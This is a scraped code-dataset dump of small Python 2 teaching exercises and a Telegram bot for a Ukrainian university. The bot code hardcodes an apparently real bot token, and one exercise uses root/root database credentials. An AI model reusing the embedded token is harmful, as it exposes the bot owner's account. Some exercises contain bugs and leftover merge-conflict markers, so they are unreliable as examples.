"939b9487a13ddf9c56f975c2b189f9e8fdf3e01c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 91, "license_type": "no_license", "max_line_length": 22, "num_lines": 6, "path": "/Day2/Function/Fun13.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "def fun(b,c):\n a=b+c\n print \"inside \", a\n return a\na=fun(10, 30)\nprint \"outside\",a" }, { "alpha_fraction": 0.5806451439857483, "alphanum_fraction": 0.6451612710952759, "avg_line_length": 9.666666984558105, "blob_id": "191606b930a5878c29d4bd446e8825df353b0bdb", "content_id": "1fa316d9dbab859d91b5ec75e6a3c6cf31cc97c8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 31, "license_type": "no_license", "max_line_length": 16, "num_lines": 3, "path": "/Day2/Number/Num7.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "a=10L\nb=int(a)\nprint b, type(b)" }, { "alpha_fraction": 0.28947368264198303, "alphanum_fraction": 0.6052631735801697, "avg_line_length": 18.5, "blob_id": "747b6c66b0a9677d5811e1eabd6851d02851d7e3", "content_id": "feef60123eb19e4f17292b6657926e3032845ddd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 38, "license_type": "no_license", "max_line_length": 25, "num_lines": 2, "path": "/Day2/List/List3.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "a=[10,20,50.5,'hey',500L]\nprint a[2:5]" }, { "alpha_fraction": 0.3333333432674408, "alphanum_fraction": 0.5833333134651184, "avg_line_length": 8.600000381469727, "blob_id": "ba5589ee6768713691d5372cef21cdbed78ffb69", "content_id": "dd880a46e617f792da4e4521f32e5b81d7296160", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 48, "license_type": "no_license", "max_line_length": 18, "num_lines": 5, "path": "/Day2/Tuple/Tup8.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "a=(10,20,30,'hey')\nb=(200,500)\n\ndel b\nprint a,b\n" }, { "alpha_fraction": 0.5614973306655884, "alphanum_fraction": 0.5828877091407776, "avg_line_length": 12.357142448425293, "blob_id": "03685f4dd271b6464b2e1c71821b6ede17564ea6", "content_id": "113287e5d220cf38291d68c0d24c1b54a2529acc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 187, "license_type": "no_license", "max_line_length": 41, "num_lines": 14, "path": "/Day5/In_Op/Io1.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "<<<<<<< HEAD\nimport os\n#print \"file path change\",os.chdir(\"str\")\nos.rmdir(\"str/a\")\n=======\n\na=open(\"my.txt\",\"r\")\nb=a.read()\nprint a.mode\nprint a.name\n\nprint b\na.close()\n>>>>>>> Sept18_19\n" }, { "alpha_fraction": 0.5454545617103577, "alphanum_fraction": 0.6363636255264282, "avg_line_length": 10.5, "blob_id": "8a9ab4d1a4d6dca9567fe764519199e841f51e31", "content_id": "13666577081b39fa6598354b715dc99996c92e09", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 22, "license_type": "no_license", "max_line_length": 12, "num_lines": 2, "path": "/Day2/String/String3.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "a=\"hello\"\nprint a[0:2]" }, { "alpha_fraction": 0.7142857313156128, "alphanum_fraction": 0.7142857313156128, "avg_line_length": 22.66666603088379, "blob_id": "e9de73b583be98a5bf021d697b80fa4131b5f794", "content_id": "302b55c47c0b6520db57fdbfed80018045aa45dd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 70, "license_type": "no_license", "max_line_length": 40, "num_lines": 3, "path": "/Day5/In_Op/OS/Io1.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "import os\nprint \"file path change\",os.chdir(\"str\")\nprint os.mkdir(\"a\")" }, { "alpha_fraction": 0.5151515007019043, "alphanum_fraction": 0.6363636255264282, "avg_line_length": 15.5, "blob_id": "95ca75417d94861e4c09591489125d1757014bf0", "content_id": "2c33eb77fb2e88851f982e56503dfdf6d2350e18", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 33, "license_type": "no_license", "max_line_length": 17, "num_lines": 2, "path": "/Day2/Function/Fun11.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "a=lambda a,b:a+b;\nprint a(20,30)\n" }, { "alpha_fraction": 0.44736841320991516, "alphanum_fraction": 0.6052631735801697, "avg_line_length": 18.25, "blob_id": "8a77aa5130c61405c12282d3e99b622679ac86a5", "content_id": "cb48b22144a27fb8caa91e642ddbf610e422aad8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 76, "license_type": "no_license", "max_line_length": 42, "num_lines": 4, "path": "/Day2/Dictionary/Dict11.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "a={'name':'jsi','id':101,'contact':123456}\na['id']=102\ndel a('name')\nprint a" }, { "alpha_fraction": 0.5099999904632568, "alphanum_fraction": 0.6299999952316284, "avg_line_length": 11.625, "blob_id": "57ed5d319bdbea9a3023fdbbeb463bbf2c236ed0", "content_id": "605b1a4f899a1b824b28927ec56272529e217d9a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 100, "license_type": "no_license", "max_line_length": 25, "num_lines": 8, "path": "/Day2/List/List18.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "a=[10,20,50.5,'hey',500L]\nb=[\"py\",'hello']\na.reverse()\nprint a\na.remove(20)\nprint a\na.sort()\nprint a" }, { "alpha_fraction": 0.6610169410705566, "alphanum_fraction": 0.7457627058029175, "avg_line_length": 19, "blob_id": "47a91763dee5a664ac66e2b764e29b2d6b645b36", "content_id": "70982582d05b1a2a5603b09b0287977e386115f5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 59, "license_type": "no_license", "max_line_length": 29, "num_lines": 3, "path": "/Day3/A/call.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "from Day3.MD import Add,Hello\nAdd.add(10, 20)\nHello.hello()" }, { "alpha_fraction": 0.7345971465110779, "alphanum_fraction": 0.758293867111206, "avg_line_length": 34.16666793823242, "blob_id": "9ee374fa49ae33e02fcb6dc7971e0c0f10227f03", "content_id": "826361ac95bfe34471a6d759b131fbc2aab01e8a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 211, "license_type": "no_license", "max_line_length": 58, "num_lines": 6, "path": "/Day5/Database/MongoDb/Mongo3.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "import pymongo\n\"\"\" list_collection_names() like table in sql\"\"\"\nmyclient=pymongo.MongoClient(\"mongodb://localhost:27017/\")\nmydb=myclient[\"mydbtest\"]\nmycol=mydb[\"custormers\"] \nprint mydb.list_collection_names()\n" }, { "alpha_fraction": 0.7142857313156128, "alphanum_fraction": 0.7142857313156128, "avg_line_length": 10, "blob_id": "28188f3edd471b41e186bc24611a17437aeb9a5a", "content_id": "091adf65a4a4e59e0c0e57b66b9e770c1001f846", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 21, "license_type": "no_license", "max_line_length": 12, "num_lines": 2, "path": "/Day3/B/B.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "import A\n#A.Amodule()" }, { "alpha_fraction": 0.6875, "alphanum_fraction": 0.6875, "avg_line_length": 23.5, "blob_id": "2093a81fcc210d3043d87955761fa608bc6e0f6c", "content_id": "70f88b5d532a8857cf33aae680c7337f7eb99050", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 48, "license_type": "no_license", "max_line_length": 31, "num_lines": 2, "path": "/Day3/Module/Phone/music.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "def musicplay():\n print \"I'm musicplay Phone\"" }, { "alpha_fraction": 0.6854838728904724, "alphanum_fraction": 0.7661290168762207, "avg_line_length": 19.66666603088379, "blob_id": "01a5157817821d5337121d150802c496e7bc962d", "content_id": "24ad897e09a9585abd94bec4270c66cfcf669f08", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 124, "license_type": "no_license", "max_line_length": 28, "num_lines": 6, "path": "/Day3/Module/Test.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "#import addition\n#import Add,Multiple\nimport Add,addition,Multiple\nAdd.add(10, 20)\naddition.add(20, 30)\nMultiple.mult(2, 3)\n" }, { "alpha_fraction": 0.6558441519737244, "alphanum_fraction": 0.6753246784210205, "avg_line_length": 14.399999618530273, "blob_id": "396a74319a823a154c21a6bbd9fbee69075a28e6", "content_id": "a551f1f045c6cd42c9564fb8470b9dc2ef17a2a7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 154, "license_type": "no_license", "max_line_length": 31, "num_lines": 10, "path": "/Day5/In_Op/Io12.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "a=open(\"new file.txt\",\"r+\")\nb=a.read()\nprint b\nposition=a.tell()\nprint position\nposition=a.seek(0,10)\nb=a.read()\nprint b\n\nprint \"file is close\",a.close()\n" }, { "alpha_fraction": 0.6285714507102966, "alphanum_fraction": 0.6285714507102966, "avg_line_length": 14.666666984558105, "blob_id": "96cddf92c0670beb0181e2e09cc5b8e371788f16", "content_id": "71359bec345faaea63d59f7ab5c1bca9d71880c8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 140, "license_type": "no_license", "max_line_length": 19, "num_lines": 9, "path": "/Day3/B/A.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "def Amodule():\n print \"Amodule\"\ndef Bmodule():\n print \"Bmodule\"\ndef Cmodule():\n print \"Cmodule\"\n\ndef Dmodule():\n print \"Dmodule\"" }, { "alpha_fraction": 0.75, "alphanum_fraction": 0.7708333134651184, "avg_line_length": 23.25, "blob_id": "f1c3a77940eaef44fa9f6f33c54983c3d4cd8dba", "content_id": "4677860ff751c0829c2c3b5b0d2c3c8b86129424", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 96, "license_type": "no_license", "max_line_length": 37, "num_lines": 4, "path": "/Day2/String/String12.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "from string import capitalize, center\na=\"hello world\"\nprint capitalize(a)\nprint a.center(15,'s')" }, { "alpha_fraction": 0.7054545283317566, "alphanum_fraction": 0.7236363887786865, "avg_line_length": 26.5, "blob_id": "caa3abd9af8672025e8d459856db8520e4e6455a", "content_id": "9e5b96a234a0743636fa7fb8c11e18e6492bb79b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 275, "license_type": "no_license", "max_line_length": 58, "num_lines": 10, "path": "/Day5/Database/MongoDb/Mongo1.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "import pymongo\n\"\"\" list_collection_names() like table in sql\"\"\"\nmyclient=pymongo.MongoClient(\"mongodb://localhost:27017/\")\nmydb=myclient[\"mydbtest\"]\ncollist=mydb.list_collection_names()\nif \"custormers\" in collist:\n \n print \"collection exists\"\nelse:\n print \"error\"\n" }, { "alpha_fraction": 0.5, "alphanum_fraction": 0.5259740352630615, "avg_line_length": 14.5, "blob_id": "b137f758c4d6f8a4961bbd163885b8fb3dc8de17", "content_id": "c445e0ab094c35f3ff87675f766bc7685719431f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 154, "license_type": "no_license", "max_line_length": 27, "num_lines": 10, "path": "/Day4/Class/Cls1.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "class sk:\n def __init__(self,n):\n self.n=n\n \n def display(self,name):\n self.n=name\ns=sk(\"hello\")\ns1=sk(10)\nprint s.n\nprint s1.n" }, { "alpha_fraction": 0.6666666865348816, "alphanum_fraction": 0.6666666865348816, "avg_line_length": 19, "blob_id": "27081970dbba7e7d90a8a649e474362f1ab748c5", "content_id": "cee6a17ea436350ed69dfc405c43fb7db836acb0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 39, "license_type": "no_license", "max_line_length": 23, "num_lines": 2, "path": "/Day2/String/String10.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "a=\"hello world\"\nprint r\"c:\\\\etc\\init.d\"" }, { "alpha_fraction": 0.6268656849861145, "alphanum_fraction": 0.6268656849861145, "avg_line_length": 16, "blob_id": "51d771a6fdd4a546e1a2d7958b6bf6a1d82a9bfd", "content_id": "b6c4623e35934d92803598811c4b182dacca3e14", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 67, "license_type": "no_license", "max_line_length": 20, "num_lines": 4, "path": "/com/sk/sfile1.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "def adisplay():\n print \"adisplay\"\ndef vikas():\n print \"vikas\"" }, { "alpha_fraction": 0.34065935015678406, "alphanum_fraction": 0.5824176073074341, "avg_line_length": 9.222222328186035, "blob_id": "e159b7afaf62d0d331fa81cbd2f382cc076952e7", "content_id": "a76174a6d8cbf0f073e9a7284048e97289544eb1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 91, "license_type": "no_license", "max_line_length": 18, "num_lines": 9, "path": "/Day2/Tuple/Tup6.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "a=(10,20,30,'hey')\nb=20\na[0]=20\nprint a\nprint a[0:3]\na=[10,20,30,'hey']\nb=20\na[0]=b\nprint a" }, { "alpha_fraction": 0.49504950642585754, "alphanum_fraction": 0.6138613820075989, "avg_line_length": 11.625, "blob_id": "e04ad191dee66f9063420374cb595ec49c328ff1", "content_id": "2bcb8af83dd9df699cb71c4bb21bd9b6255acd6e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 101, "license_type": "no_license", "max_line_length": 18, "num_lines": 8, "path": "/Day2/Tuple/Tup1.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "a=(10,20,30,'hey')\nb=(200,500)\n\nprint min(a)\nprint max(a)\nprint cmp(a, b)\nc=list(a)\nprint c, type(c)\n" }, { "alpha_fraction": 0.5274725556373596, "alphanum_fraction": 0.6263736486434937, "avg_line_length": 22, "blob_id": "8165483ded261c7585d1f974a31fa48520cd6384", "content_id": "03786f0805bb4d0474d0cca9373785f29c6718f8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 91, "license_type": "no_license", "max_line_length": 42, "num_lines": 4, "path": "/Day2/Dictionary/Dict7.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "a={'name':'jsi','id':101,'contact':123456}\nprint a['name']\nprint a['id']\nprint a['contact']" }, { "alpha_fraction": 0.5454545617103577, "alphanum_fraction": 0.6363636255264282, "avg_line_length": 7, "blob_id": "f0408cc4f180ee252331ea15149108cda3f236ad", "content_id": "0244a4efd74043d94915366732f6fbaef14b50d8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 33, "license_type": "no_license", "max_line_length": 14, "num_lines": 4, "path": "/Day2/Number/Num17.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "a=10\nc=5\nb=complex(a,c)\nprint b\n\n" }, { "alpha_fraction": 0.6351351141929626, "alphanum_fraction": 0.7432432174682617, "avg_line_length": 17.25, "blob_id": "2a351f2d39510b9ae0edab526aca0b0ba77ad753", "content_id": "7006fb6b3408b60c4318332f50a16601dbdbb16b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 74, "license_type": "no_license", "max_line_length": 31, "num_lines": 4, "path": "/Day2/Number/Random2.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "import random\na=20\nprint random.random()\nprint random.choice([10,20,30])\n\n" }, { "alpha_fraction": 0.6547619104385376, "alphanum_fraction": 0.6547619104385376, "avg_line_length": 20, "blob_id": "1af0de7f650f19a66fa3f00ed15018937c457c80", "content_id": "a5482f1e4cf180c51c9f4780ae2e6ee7811ac6d3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 168, "license_type": "no_license", "max_line_length": 46, "num_lines": 8, "path": "/Day5/In_Op/Io4.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "\na=open(\"myfile.txt\",\"wr+\")\na.write(raw_input(\"Enter your String data: \"))\na.close()\na=open(\"myfile.txt\",\"wr+\")\nb=a.read()\nprint b\nprint \"file going to close\"\na.close()" }, { "alpha_fraction": 0.7058823704719543, "alphanum_fraction": 0.7058823704719543, "avg_line_length": 8, "blob_id": "3748ae50f5af26e266bc093b7c0c290592236654", "content_id": "e57a2da6274b0161e49739eb5d872b9927229219", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 17, "license_type": "no_license", "max_line_length": 9, "num_lines": 2, "path": "/Day2/String/String2.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "a='hello'\nprint a" }, { "alpha_fraction": 0.6000000238418579, "alphanum_fraction": 0.6000000238418579, "avg_line_length": 13.55555534362793, "blob_id": "565b146550476f5cd459f610fd46c869943e751b", "content_id": "70648a767c8c780535517852a487aa49d40243e1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 130, "license_type": "no_license", "max_line_length": 27, "num_lines": 9, "path": "/Day4/Class/Cls4.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "class sk:\n n=\"hello\"\n def display(self,name):\n self.n=name\ns=sk()\nprint s.n\ns.display(\"python\")\nprint (s.n)\nprint s.n" }, { "alpha_fraction": 0.41999998688697815, "alphanum_fraction": 0.5, "avg_line_length": 8.090909004211426, "blob_id": "d5289e655074a303d0e67d35b0bc20797a20ddee", "content_id": "f1e0c22a65415d0035b85bccf5c0b50ac79e2610", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 100, "license_type": "no_license", "max_line_length": 12, "num_lines": 11, "path": "/Day2/Number/Num18.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "a=50.1\n'''abs(x)'''\nprint abs(a)\n\na=-50.1\n'''abs(x)'''\nprint abs(a)\n\na=50\n'''abs(x)'''\nprint abs(a)\n" }, { "alpha_fraction": 0.6743295192718506, "alphanum_fraction": 0.6743295192718506, "avg_line_length": 19.153846740722656, "blob_id": "6df223b0b24f94ecffa8a626d71d47829d8a3123", "content_id": "79ae2353fda49092706e510bad05426fefdf5637", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 261, "license_type": "no_license", "max_line_length": 31, "num_lines": 13, "path": "/Day5/Database/mysqlDB/Db10.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "import mysql.connector\n'''check database table'''\nmydata=mysql.connector.connect(\n host=\"localhost\",\n user=\"root\",\n password=\"root\",\n database=\"SAVANJI\"\n )\ncursor=mydata.cursor()\ncursor.execute(\"SHOW TABLES \")\n\nfor a in cursor:\n print a" }, { "alpha_fraction": 0.5833333134651184, "alphanum_fraction": 0.6666666865348816, "avg_line_length": 11.333333015441895, "blob_id": "e2bd46730897b7dbfe1a469582286faaaa6b16aa", "content_id": "e67f2ede44c7af6321d60b58ff8f6e53aef4ea4d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 36, "license_type": "no_license", "max_line_length": 16, "num_lines": 3, "path": "/Day2/Number/Num14.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "a=10.0\nb=complex(a)\nprint b, type(b)" }, { "alpha_fraction": 0.6268656849861145, "alphanum_fraction": 0.6716417670249939, "avg_line_length": 6.55555534362793, "blob_id": "60c80320047292b55e79c8329ca1699f4f9af2f8", "content_id": "f658d8ede335dd6ca6bc8a27b3383b5b0050b468", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 67, "license_type": "no_license", "max_line_length": 12, "num_lines": 9, "path": "/Day2/Number/Num16.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "a=10+5j\nb=long(a)\nprint b\n\nb=float(a)\nprint b\n\nb=complex(a)\nprint b" }, { "alpha_fraction": 0.8627451062202454, "alphanum_fraction": 0.8627451062202454, "avg_line_length": 25, "blob_id": "eca54f4a1b3ab5c22d50070d282e63f77f157fc5", "content_id": "36c10e6f2fdaa4c4c6fc55c89c758ac9f094d1ad", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 51, "license_type": "no_license", "max_line_length": 27, "num_lines": 2, "path": "/Day3/Module/Phone/__init__.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "from MsgFile import msg\nfrom music import musicplay" }, { "alpha_fraction": 0.5107913613319397, "alphanum_fraction": 0.5107913613319397, "avg_line_length": 16.375, "blob_id": "894300a0416be8fba69fde9b46824a65008b0b73", "content_id": "06e96791525aa4ff7c3f55b1c16cb5d224bc8bde", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 139, "license_type": "no_license", "max_line_length": 23, "num_lines": 8, "path": "/Day3/Class/Cls1.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "class Mycls:\n def __init__(self):\n \"helo python\"\n def display():\n print \"hello\"\n \nMycls.__doc__\nMycls.display()\n" }, { "alpha_fraction": 0.6201117038726807, "alphanum_fraction": 0.6201117038726807, "avg_line_length": 21.125, "blob_id": "f99bc9b21ae2b25623bbd5cedcd49fe287db5d3c", "content_id": "3df9983d0781e02bf19f8c2f33c39679c5cbb136", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 179, "license_type": "no_license", "max_line_length": 44, "num_lines": 8, "path": "/Day5/Exception/Excep6.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "try:\n a=open(\"test.txt\",\"r\")\n a.write(\"hey this is python\")\nexcept:\n print \"cant not file and write the file\"\nelse:\n print \"file is succesfully write\"\n a.close() " }, { "alpha_fraction": 0.6304348111152649, "alphanum_fraction": 0.6521739363670349, "avg_line_length": 18.285715103149414, "blob_id": "b48d612b8624391d1b1865761a2f796c97273498", "content_id": "bf753f9732c96a536eaf5e8adb6bbf942d199902", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 138, "license_type": "no_license", "max_line_length": 52, "num_lines": 7, "path": "/Day5/Exception/Excep2.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "try:\n a=10/0\n print a\nexcept ArithmeticError, a :\n print \"this statement is raising an exception\",a\nelse:\n print \"welcome\" " }, { "alpha_fraction": 0.5901639461517334, "alphanum_fraction": 0.5901639461517334, "avg_line_length": 14.5, "blob_id": "dda7388691781df3e76b4e8207ff39e9e5ba33e5", "content_id": "b56c7828d59ab263388eba6ddf094aa10127c986", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 61, "license_type": "no_license", "max_line_length": 19, "num_lines": 4, "path": "/Vikas/A/afile.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "def display():\n print \"display\"\ndef dis():\n print \"dis\"" } ]
115
OksanaBukartyk/telegram-bot
https://github.com/OksanaBukartyk/telegram-bot
cb37916f702d69d548ca3da3aea8ca6e0fb817e6
dc84730a5c6fc635f865ee4927e386f551afc9e2
fbaea7a02aa9c861cd1c684c6189d02a12895262
refs/heads/main
2023-07-26T14:31:18.371696
2021-09-06T12:52:17
2021-09-06T12:52:17
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7245119214057922, "alphanum_fraction": 0.7375271320343018, "avg_line_length": 24.66666603088379, "blob_id": "92f97ec63fe0645b7ea7b642b607606f926a9880", "content_id": "61c4ce99fe88609592b566b693adf3391f9f647c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 461, "license_type": "no_license", "max_line_length": 87, "num_lines": 18, "path": "/README.md", "repo_name": "OksanaBukartyk/telegram-bot", "src_encoding": "UTF-8", "text": "# telegram-bot\nThe program works so far only after running on a local computer\n\n\nProject launch:\n\n1. Download Zip or write in terminal: $ git clone [email protected]:OksanaPetriv/telegram-bot.git\n2. install requirements: $ pip install -r requiremets.txt\n\nScreanshots:\n![start](screen/start.png)\n![start2](screen/start2.png)\n![abit](screen/ab.png)\n![stud](screen/stud.png)\n![zno](screen/zno.png)\n![zno2](screen/zno2.png)\n![chats](screen/chats.png)\n![exit](screen/exit.png)" }, { "alpha_fraction": 0.6273632049560547, "alphanum_fraction": 0.6547315716743469, "avg_line_length": 57.551204681396484, "blob_id": "754edfebf360fbb195b6c34ef195f61f8bd69d6d", "content_id": "880055617f436fb7dc7dfb2d5d7bb67da5114b83", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 44952, "license_type": "no_license", "max_line_length": 192, "num_lines": 664, "path": "/main.py", "repo_name": "OksanaBukartyk/telegram-bot", "src_encoding": "UTF-8", "text": "import telebot\nimport os\nPORT = int(os.environ.get('PORT', 5000))\nlupa=u'\\U0001F50D'\nbulavka=u'\\U0001F4CC'\nbacks=u'\\U000021A9'\nstrilky=u'\\U0001F53B'\nbooks=u'\\U0001F4DC'\nTOKEN='1968621740:AAGESlwAL0lvnSc-rS5etPhBUOc6MMcX7IU'\nbot = telebot.TeleBot (TOKEN)\nkeyboard1 = telebot.types.ReplyKeyboardMarkup(True)\nkeyboard1.row('Інформація про університет' )\nkeyboard1.row('Абітурієнт','Студент')\nkeyboard1.row('Вихід' )\n\[email protected]_handler(commands=['start'])\ndef start_message(message):\n bot.send_message(message.chat.id, 'Вітаю в Прикарпатському національному університеті імені '\n 'Василя Стефаника. \\nЯ постараюсь допомогти знайти тобі'\n ' всю неоюхідну інфомацію.', reply_markup=keyboard1)\n bot.send_sticker(message.chat.id, 'CAACAgIAAxkBAAIFkl7L6pcZSw0fQgOjiP9d77M__kzFAALTAANWnb0K9TKPl9US-T0ZBA')\[email protected]_handler(content_types=['text'])\ndef send_text(message):\n if message.text.lower() == 'інформація про університет':\n any_univer(message)\n\n\n elif message.text.lower() == 'вихід':\n bot.send_message(message.chat.id, 'Прощавай.')\n bot.send_sticker(message.chat.id, 'CAACAgIAAxkBAAIFll7L6t7YKtdXtod0VN-kgMOqjeQJAALkAANWnb0KFpvtj-7xNQQZBA')\n\n elif message.text.lower() == 'студент':\n bot.send_sticker(message.chat.id, 'CAACAgIAAxkBAAIFl17L6w_BZVk5Kb4ZT5tslV_SlGv-AALjAANWnb0KD_gizK2mCzcZBA')\n any_student(message)\n\n elif message.text.lower() == 'абітурієнт':\n bot.send_sticker(message.chat.id, 'CAACAgIAAxkBAAIKU17M9RnicWAbyeFTPRExXA36d9IYAALhAANWnb0KW8GUi0D406AZBA')\n any_abit(message)\n elif message.text == '123' or message.text=='132' or message.text== '213' or message.text=='231' or message.text=='321' or message.text=='312':\n f7 = open('Information/ЗНО/123.txt', 'r')\n bot.send_message(chat_id=message.chat.id, text=f7.read())\n backend(message, 'Back4.8')\n elif message.text.lower() == '124' or message.text=='142' or message.text=='214' or message.text=='241' or message.text=='421' or message.text== '412':\n f7 = open('Information/ЗНО/124.txt', 'r')\n bot.send_message(chat_id=message.chat.id, text=f7.read())\n backend(message, 'Back4.8')\n elif message.text.lower() == '125' or message.text=='152' or message.text=='215' or message.text=='251' or message.text=='521' or message.text=='512':\n f7 = open('Information/ЗНО/125.txt', 'r')\n bot.send_message(chat_id=message.chat.id, text=f7.read())\n backend(message, 'Back4.8')\n elif message.text.lower() == '126' or message.text=='162' or message.text=='216' or message.text=='261' or message.text=='621' or message.text=='612':\n f7 = open('Information/ЗНО/126.txt', 'r')\n bot.send_message(chat_id=message.chat.id, text=f7.read())\n backend(message, 'Back4.8')\n elif message.text.lower() == '134' or message.text=='143' or message.text=='314' or message.text=='341' or message.text=='431' or message.text=='413':\n f7 = open('Information/ЗНО/134.txt', 'r')\n bot.send_message(chat_id=message.chat.id, text=f7.read())\n backend(message, 'Back4.8')\n elif message.text.lower() == '135' or message.text=='153' or message.text=='315' or message.text=='351' or message.text=='531' or message.text=='513':\n f7 = open('Information/ЗНО/135.txt', 'r')\n bot.send_message(chat_id=message.chat.id, text=f7.read())\n backend(message, 'Back4.8')\n elif message.text.lower() == '136' or message.text=='163' or message.text=='316' or message.text=='361' or message.text=='631' or message.text=='613':\n f7 = open('Information/ЗНО/136.txt', 'r')\n bot.send_message(chat_id=message.chat.id, text=f7.read())\n backend(message, 'Back4.8')\n elif message.text.lower() == '138' or message.text=='183' or message.text=='318' or message.text=='381' or message.text=='831' or message.text=='813':\n f7 = open('Information/ЗНО/138.txt', 'r')\n bot.send_message(chat_id=message.chat.id, text=f7.read())\n backend(message, 'Back4.8')\n elif message.text.lower() == '145' or message.text=='154' or message.text=='415' or message.text=='451' or message.text=='541' or message.text=='514':\n f7 = open('Information/ЗНО/145.txt', 'r')\n bot.send_message(chat_id=message.chat.id, text=f7.read())\n backend(message, 'Back4.8')\n elif message.text.lower() == '146' or message.text=='164' or message.text=='416' or message.text=='461' or message.text=='641' or message.text=='614':\n f7 = open('Information/ЗНО/146.txt', 'r')\n bot.send_message(chat_id=message.chat.id, text=f7.read())\n backend(message, 'Back4.8')\n elif message.text.lower() == '147' or 